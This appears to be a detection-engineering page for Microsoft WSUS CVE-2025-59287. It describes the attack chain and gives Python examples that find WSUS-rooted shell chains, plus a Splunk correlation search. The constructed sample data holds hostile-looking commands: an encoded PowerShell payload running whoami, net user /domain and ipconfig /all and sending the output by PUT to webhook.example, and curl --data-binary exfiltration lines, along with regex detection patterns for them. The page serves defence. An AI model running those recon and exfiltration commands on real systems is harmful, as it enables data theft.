Analytics Story: Microsoft WSUS CVE-2025-59287
Description
This analytic story addresses the exploitation of CVE-2025-59287, a critical remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS). Threat actors exploit a deserialization vulnerability in the WSUS AuthorizationCookie to achieve unauthenticated remote code execution on exposed WSUS servers. The attack leverages publicly accessible WSUS instances on default ports 8530/TCP (HTTP) and 8531/TCP (HTTPS) to send specially crafted POST requests that trigger deserialization attacks, resulting in shell spawning from the WSUS service and IIS worker processes.
Why it matters
On October 23, 2025, Microsoft released an out-of-band security update for CVE-2025-59287, a critical deserialization vulnerability affecting Windows Server Update Services (WSUS). Security researchers at Huntress observed active exploitation starting around October 23, 2025 at 23:34 UTC, where threat actors targeted WSUS instances exposed to the internet on their default ports.

The attack chain begins with the adversary sending multiple specially crafted HTTP POST requests to WSUS web service endpoints including /SimpleAuthWebService/SimpleAuth.asmx, /ClientWebService/Client.asmx, and /ReportingWebService/ReportingWebService.asmx. These requests exploit the deserialization vulnerability in the AuthorizationCookie parameter, allowing attackers to achieve unauthenticated remote code execution.

Upon successful exploitation, the attack manifests in two distinct process execution chains: wsusservice.exe spawning cmd.exe, which subsequently spawns PowerShell, and w3wp.exe (the IIS worker process) following a similar pattern. The malicious PowerShell payload, delivered in base64-encoded format using the -ec parameter, executes reconnaissance commands including whoami, net user /domain for Active Directory enumeration, and ipconfig /all for network configuration discovery. The collected data is then exfiltrated to remote webhook services using either PowerShell's Invoke-WebRequest cmdlet with the PUT method or curl.exe with the --data-binary flag. Attackers have been observed using proxy networks to obfuscate their source infrastructure during exploitation attempts.

Organizations should immediately apply Microsoft's security update, isolate WSUS servers from direct internet access, and restrict inbound traffic on ports 8530 and 8531 to only authorized management hosts and Microsoft Update servers.
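The process chains and payload shape described above can be checked directly against process-creation telemetry. The following Python is an added example written for this page, not code from the Splunk analytic story or from Huntress: it walks constructed Sysmon EventID 1 style events (invented PIDs, paths and command lines), rebuilds each process's ancestry, flags PowerShell launched by cmd.exe under WsusService.exe or w3wp.exe, decodes any `-ec` (UTF-16LE base64) payload, and reports which of the reconnaissance and exfiltration commands named in the story appear. The sample payload, webhook URL and event fields are all constructed for the example.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed sample payload: the recon-and-exfil one-liner shape the story
# describes, delivered through PowerShell's -ec (UTF-16LE, then base64).
RECON_PAYLOAD = (
    "whoami; net user /domain; ipconfig /all | "
    "Invoke-WebRequest -Uri https://webhook.example/collect -Method PUT -Body $out"
)
ENCODED = base64.b64encode(RECON_PAYLOAD.encode("utf-16le")).decode("ascii")

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"

# Constructed process-creation events (Sysmon EventID 1 style fields). PIDs and
# command lines are invented; a real pipeline should key on ProcessGuid rather
# than PID so that PID reuse cannot splice unrelated processes into one chain.
SAMPLE_EVENTS: List[Dict] = [
    {"ProcessId": 4000, "ParentProcessId": 1200,
     "Image": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "CommandLine": "WsusService.exe"},
    {"ProcessId": 4100, "ParentProcessId": 4000, "Image": CMD,
     "CommandLine": "cmd.exe /c powershell -ec " + ENCODED},
    {"ProcessId": 4200, "ParentProcessId": 4100, "Image": PS,
     "CommandLine": "powershell -ec " + ENCODED},
    {"ProcessId": 6000, "ParentProcessId": 1300,
     "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "w3wp.exe -ap WsusPool"},
    {"ProcessId": 6100, "ParentProcessId": 6000, "Image": CMD,
     "CommandLine": 'cmd.exe /c powershell -c "curl.exe --data-binary @out.txt https://webhook.example/x"'},
    {"ProcessId": 6200, "ParentProcessId": 6100, "Image": PS,
     "CommandLine": 'powershell -c "curl.exe --data-binary @out.txt https://webhook.example/x"'},
    # Benign control: an interactive PowerShell launched from Explorer.
    {"ProcessId": 5000, "ParentProcessId": 900,
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    {"ProcessId": 5100, "ParentProcessId": 5000, "Image": PS,
     "CommandLine": "powershell.exe -NoProfile"},
]

WSUS_ROOTS = {"wsusservice.exe", "w3wp.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
ENC_FLAG = re.compile(r"^-(?:e|ec|enc|encodedcommand)$", re.IGNORECASE)

# Recon and exfil indicators named in the story, matched against the raw
# command line plus the decoded -ec payload (if any).
INDICATORS = {
    "whoami": re.compile(r"\bwhoami\b", re.I),
    "net user /domain": re.compile(r"\bnet1?\s+user\s+/domain", re.I),
    "ipconfig /all": re.compile(r"\bipconfig\s+/all", re.I),
    "Invoke-WebRequest PUT": re.compile(r"invoke-webrequest.*-method\s+put", re.I | re.S),
    "curl --data-binary": re.compile(r"\bcurl(?:\.exe)?\b.*--data-binary", re.I | re.S),
}


def image_name(path: str) -> str:
    """Lower-cased executable name from a full image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(pid: int, by_pid: Dict[int, Dict]) -> List[str]:
    """Image names from the process itself up to its oldest ancestor in the data."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid]["Image"]))
        pid = by_pid[pid]["ParentProcessId"]
    return chain


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -ec/-EncodedCommand payload, or None if absent or invalid."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if ENC_FLAG.match(tok):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def find_wsus_shell_chains(events: List[Dict]) -> List[Dict]:
    """Flag PowerShell whose parent is cmd.exe beneath WsusService.exe or w3wp.exe."""
    by_pid = {e["ProcessId"]: e for e in events}
    findings = []
    for e in events:
        chain = ancestry(e["ProcessId"], by_pid)
        if chain[0] not in SHELLS or len(chain) < 3 or chain[1] != "cmd.exe":
            continue
        if not WSUS_ROOTS.intersection(chain[2:]):
            continue
        decoded = decode_encoded_command(e["CommandLine"])
        text = e["CommandLine"] + "\n" + (decoded or "")
        hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
        findings.append({"pid": e["ProcessId"], "chain": chain,
                         "decoded": decoded, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in find_wsus_shell_chains(SAMPLE_EVENTS):
        print(f["pid"], " <- ".join(f["chain"]), f["indicators"])
```

Running it flags only the two WSUS-rooted chains (PIDs 4200 and 6200) and leaves the Explorer-launched shell alone; the first finding carries the decoded payload and all four recon and PUT-exfil indicators, the second the curl.exe exfil indicator. The ancestry walk stops at the oldest PID present in the data, so a parent that was never logged simply ends the chain rather than raising an error.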
Correlation Search
Windows Common Abused Cmd Shell Risk Behavior
```spl
| tstats `security_content_summariesonly`
    min(_time) as firstTime max(_time) as lastTime
    sum(All_Risk.calculated_risk_score) as risk_score,
    count(All_Risk.calculated_risk_score) as risk_event_count,
    values(All_Risk.annotations.mitre_attack.mitre_tactic_id) as annotations.mitre_attack.mitre_tactic_id,
    dc(All_Risk.annotations.mitre_attack.mitre_tactic_id) as mitre_tactic_id_count,
    values(All_Risk.annotations.mitre_attack.mitre_technique_id) as annotations.mitre_attack.mitre_technique_id,
    dc(All_Risk.annotations.mitre_attack.mitre_technique_id) as mitre_technique_id_count,
    values(All_Risk.tag) as tag, values(source) as source, dc(source) as source_count
    from datamodel=Risk.All_Risk
    where source IN ("*Windows Cmdline Tool Execution From Non-Shell Process*", "*Windows System Network Config Discovery Display DNS*", "*Local Account Discovery With Wmic*", "*Windows Group Discovery Via Net*", "*Windows Create Local Administrator Account Via Net*", "*Windows User Discovery Via Net*", "*Icacls Deny Command*", "*ICACLS Grant Command*", "*Windows Proxy Via Netsh*", "*Processes launching netsh*", "*Disabling Firewall with Netsh*", "*Windows System Network Connections Discovery Netsh*", "*Network Connection Discovery With Arp*", "*Windows System Discovery Using ldap Nslookup*", "*Windows System Shutdown CommandLine*")
    by All_Risk.risk_object All_Risk.risk_object_type All_Risk.annotations.mitre_attack.mitre_tactic
| `drop_dm_object_name(All_Risk)`
| `security_content_ctime(firstTime)`
| `security_content_ctime(lastTime)`
| where source_count >= 4
| `windows_common_abused_cmd_shell_risk_behavior_filter`
```
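The correlation search above is risk-based alerting: it aggregates Risk data model rows per risk object and only fires when at least four distinct contributing detections (`dc(source) >= 4`) have hit the same object. The following Python is an added example, not part of the Splunk content, that re-implements that aggregation over constructed risk events so the threshold logic can be seen on sample data. The source patterns are copied from the search's `IN (...)` list; the hosts, timestamps, scores and MITRE annotations are invented. Note that, like the search, it groups by risk object, object type and MITRE tactic, so detections spread across different tactics for the same host do not pool toward the threshold.

```python
import fnmatch
from collections import defaultdict
from typing import Dict, List

# Source name patterns copied from the correlation search's `source IN (...)`.
SOURCE_PATTERNS = [
    "*Windows Cmdline Tool Execution From Non-Shell Process*",
    "*Windows System Network Config Discovery Display DNS*",
    "*Local Account Discovery With Wmic*", "*Windows Group Discovery Via Net*",
    "*Windows Create Local Administrator Account Via Net*",
    "*Windows User Discovery Via Net*", "*Icacls Deny Command*",
    "*ICACLS Grant Command*", "*Windows Proxy Via Netsh*",
    "*Processes launching netsh*", "*Disabling Firewall with Netsh*",
    "*Windows System Network Connections Discovery Netsh*",
    "*Network Connection Discovery With Arp*",
    "*Windows System Discovery Using ldap Nslookup*",
    "*Windows System Shutdown CommandLine*",
]


def risk_event(t, obj, source, score, tactic, tactic_id, technique_id) -> Dict:
    """One Risk data model row (constructed sample shape, not real Splunk output)."""
    return {"_time": t, "risk_object": obj, "risk_object_type": "system",
            "source": source, "calculated_risk_score": score,
            "mitre_tactic": tactic, "mitre_tactic_id": tactic_id,
            "mitre_technique_id": technique_id}


# Constructed risk events: wsus01 trips five distinct Discovery detections (plus
# one Execution detection that lands in a separate group), srv02 trips the same
# two detections three times each, srv03 trips three in-scope detections and one
# detection outside the search's source list.
RISK_EVENTS = [
    risk_event(1761261000, "wsus01", "Windows Cmdline Tool Execution From Non-Shell Process", 25, "Execution", "TA0002", "T1059"),
    risk_event(1761261010, "wsus01", "Windows User Discovery Via Net", 20, "Discovery", "TA0007", "T1087.002"),
    risk_event(1761261020, "wsus01", "Windows Group Discovery Via Net", 15, "Discovery", "TA0007", "T1069.001"),
    risk_event(1761261030, "wsus01", "Windows System Network Config Discovery Display DNS", 15, "Discovery", "TA0007", "T1016"),
    risk_event(1761261040, "wsus01", "Network Connection Discovery With Arp", 20, "Discovery", "TA0007", "T1049"),
    risk_event(1761261050, "wsus01", "Windows System Discovery Using ldap Nslookup", 20, "Discovery", "TA0007", "T1018"),
    risk_event(1761262000, "srv02", "Windows Proxy Via Netsh", 30, "Defense Evasion", "TA0005", "T1090"),
    risk_event(1761262010, "srv02", "Disabling Firewall with Netsh", 30, "Defense Evasion", "TA0005", "T1562.004"),
    risk_event(1761262020, "srv02", "Windows Proxy Via Netsh", 30, "Defense Evasion", "TA0005", "T1090"),
    risk_event(1761262030, "srv02", "Disabling Firewall with Netsh", 30, "Defense Evasion", "TA0005", "T1562.004"),
    risk_event(1761262040, "srv02", "Windows Proxy Via Netsh", 30, "Defense Evasion", "TA0005", "T1090"),
    risk_event(1761262050, "srv02", "Disabling Firewall with Netsh", 30, "Defense Evasion", "TA0005", "T1562.004"),
    risk_event(1761263000, "srv03", "Windows User Discovery Via Net", 20, "Discovery", "TA0007", "T1087.002"),
    risk_event(1761263010, "srv03", "Windows Group Discovery Via Net", 15, "Discovery", "TA0007", "T1069.001"),
    risk_event(1761263020, "srv03", "Network Connection Discovery With Arp", 20, "Discovery", "TA0007", "T1049"),
    risk_event(1761263030, "srv03", "Unrelated Custom Detection", 50, "Discovery", "TA0007", "T1082"),
]


def in_scope(source: str) -> bool:
    """Mirror the wildcard `source IN (...)` filter of the search."""
    return any(fnmatch.fnmatchcase(source, p) for p in SOURCE_PATTERNS)


def correlate(events: List[Dict], min_sources: int = 4) -> List[Dict]:
    """Mirror the tstats aggregation: group by risk object, type and tactic and
    keep only groups whose distinct contributing detections reach the threshold."""
    groups = defaultdict(list)
    for e in events:
        if in_scope(e["source"]):
            groups[(e["risk_object"], e["risk_object_type"], e["mitre_tactic"])].append(e)
    results = []
    for (obj, otype, tactic), evs in groups.items():
        sources = sorted({e["source"] for e in evs})
        if len(sources) < min_sources:  # the `where source_count >= 4` step
            continue
        techniques = {e["mitre_technique_id"] for e in evs}
        results.append({
            "risk_object": obj, "risk_object_type": otype, "mitre_tactic": tactic,
            "firstTime": min(e["_time"] for e in evs),
            "lastTime": max(e["_time"] for e in evs),
            "risk_score": sum(e["calculated_risk_score"] for e in evs),
            "risk_event_count": len(evs),
            "mitre_tactic_id": sorted({e["mitre_tactic_id"] for e in evs}),
            "mitre_technique_id": sorted(techniques),
            "mitre_technique_id_count": len(techniques),
            "source": sources, "source_count": len(sources),
        })
    return results


if __name__ == "__main__":
    for hit in correlate(RISK_EVENTS):
        print(hit["risk_object"], hit["mitre_tactic"], hit["source_count"], hit["risk_score"])
```

On the sample data only wsus01's Discovery group fires: srv02 has six risk events but only two distinct sources, which is exactly why the search thresholds on `dc(source)` rather than on event count, and srv03's fourth detection is outside the search's source list and is never counted.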
Detections
Data Sources
| Name | Platform | Sourcetype | Source |
|---|---|---|---|
| Cisco Network Visibility Module Flow Data | | cisco:nvm:flowdata | not_applicable |
| CrowdStrike ProcessRollup2 | N/A | crowdstrike:events:sensor | crowdstrike |
| Powershell Script Block Logging 4104 | | XmlWinEventLog | XmlWinEventLog:Microsoft-Windows-PowerShell/Operational |
| Sysmon EventID 1 | | XmlWinEventLog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational |
| Sysmon for Linux EventID 1 | | sysmon:linux | Syslog:Linux-Sysmon/Operational |
| Windows Event Log Security 4688 | | XmlWinEventLog | XmlWinEventLog:Security |
References
- https://www.huntress.com/blog/exploitation-of-windows-server-update-services-remote-code-execution-vulnerability
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59287
- https://hawktrace.com/blog/CVE-2025-59287-UNAUTH
Source: GitHub | Version: 1